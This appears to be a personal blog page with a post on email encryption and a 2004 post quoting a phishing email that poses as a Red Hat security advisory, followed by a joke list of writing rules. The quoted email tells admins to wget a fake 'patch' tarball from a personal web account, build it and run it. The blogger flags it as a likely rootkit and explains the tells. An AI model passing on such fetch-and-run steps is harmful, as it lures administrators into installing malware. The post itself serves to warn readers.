Sun, 13 Nov 2005

A Meme That Isn't A Waste of Your Time

Sven-S. Porst challenged me to talk about email encryption (PGP/ S/MIME, or something), and to suggest to 5 others that they do the same… I realize that you aren’t all Mac folk, but it’s reasonably straightforward in Thunderbird, Outlook, Evolution, and several other mailers, so hopefully you’ll give it a whirl.

First, if you’re using Apple Mail, there’s a really friendly guide to getting it set up. Otherwise, the Wikipedia entries for S/MIME and PGP might be worth checking.

:: 21:19
:: /tech/computers/security | [+]
::Comments (0)

Sat, 23 Oct 2004

Redhat Phish

Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:


logo

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

  • First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
  • Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.


Very credible looking, except for a few little niggles:

  • Note that the “patch” (almost certainly a rootkit) is linked to an individual user’s (“joeio”) account
  • I seriously doubt that Redhat would be relaying through a random machine in Taiwan:
    Received: from mail.forcartex.com.tw (unknown [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)

Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ‘nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail -- the HTML links to Redhat's real logo, linked from a Redhat server, and they even ran their HTML through Tidy!

Let's be careful out there!

:: 23:55
:: /tech/computers/security | [+]
::Comments (0)




William Safire’s Rules for Writers:

Remember to never split an infinitive. The passive voice should never be
used. Do not put statements in the negative form. Verbs have to agree with
their subjects. Proofread carefully to see if you words out. If you reread
your work, you can find on rereading a great deal of repetition can be
avoided by rereading and editing. A writer must not shift your point of
view. And don’t start a sentence with a conjunction. (Remember, too, a
preposition is a terrible word to end a sentence with.) Don’t overuse
exclamation marks!! Place pronouns as close as possible, especially in long
sentences, as of 10 or more words, to their antecedents. Writing carefully,
dangling participles must be avoided. If any word is improper at the end of
a sentence, a linking verb is. Take the bull by the hand and avoid mixing
metaphors. Avoid trendy locutions that sound flaky. Everyone should be
careful to use a singular pronoun with singular nouns in their writing.
Always pick on the correct idiom. The adverb always follows the verb. Last
but not least, avoid cliches like the plague; seek viable alternatives.